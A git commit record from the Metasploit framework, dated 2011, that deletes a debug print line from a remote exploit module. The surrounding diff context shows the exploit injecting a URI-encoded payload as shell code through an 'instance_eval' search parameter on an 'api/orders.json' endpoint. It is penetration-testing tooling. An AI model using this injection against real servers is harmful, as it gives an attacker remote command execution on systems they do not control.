Deleting a puts statement.

git-svn-id: file:///home/svn/framework3/trunk@13968 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Tod Beardsley 2011-10-17 03:52:10 +00:00
parent 3c36b0c975
commit 94eb3ac14c
1 changed files with 0 additions and 2 deletions

View File

@ -61,8 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
command = Rex::Text.uri_encode(payload.raw, 'hex-all')
puts command
urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
res = send_request_raw({
'uri' => urlconfigdir,